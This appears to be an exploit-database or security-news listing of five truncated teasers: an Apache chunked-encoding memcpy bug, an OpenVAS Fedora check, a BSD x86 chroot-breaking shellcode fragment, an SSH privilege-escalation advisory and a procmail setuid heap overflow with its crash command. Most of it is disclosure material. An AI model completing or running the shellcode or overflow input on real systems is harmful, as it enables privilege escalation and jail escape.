Taming the wild copy: Parallel Thread Corruption

Posted by Chris Evans, Winner of the occasional race Back in 2002, a very interesting vulnerability was found and fixed in the Apache web server. Relating to a bug in chunked encoding handing, the vulnerability caused a memcpy call with a negative length with the destination on the stack. Of...

Fedora Update for mingw-libarchive FEDORA-2013-4576

Check for the Version of mingw-libarchive OpenVAS Vulnerability Test Fedora Update for mingw-libarchive FEDORA-2013-4576 Authors: System Generated Check Copyright: Copyright c 2013 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modi...

bsd/x86 - break chroot 45 bytes

bsd/x86 break chroot 45 bytes. Shellcode exploit for bsdx86 platform / BSD version FreeBSD, OpenBSD, NetBSD. [email protected] 45 bytes. -break chrooted / char shellcode= "\x68\x62\x2e\x2e\x2e" / pushl $0x2e2e2e62 / "\x89\xe7" / movl %esp,%edi / "\x33\xc0" / xorl %eax,%eax / "\x88\x47\x03...

SSH Secure Shell for Servers fails to remove child process from master process group

Overview A locally exploitable privilege escalation vulnerability exists in SSH Secure Shell versions 2.0.13 - 3.2.1. Description Secure Shell for Servers, developed by SSH Communications Security, does not properly remove the child process from the master process group after non-interactive...

procmail heap overflow

hi, i found a heap overflow in procmail up until latest some time ago. flatline@intra:/usr/bin$ ls -la procmail -rwsr-xr-x 1 root mail 64344 Jun 3 2001 procmail flatline@intra:/usr/bin$ ./procmail perl -e 'print "A"x10240'=A procmail: Exceeded LINEBUF Segmentation fault flatline@intra:/usr/bin$ a...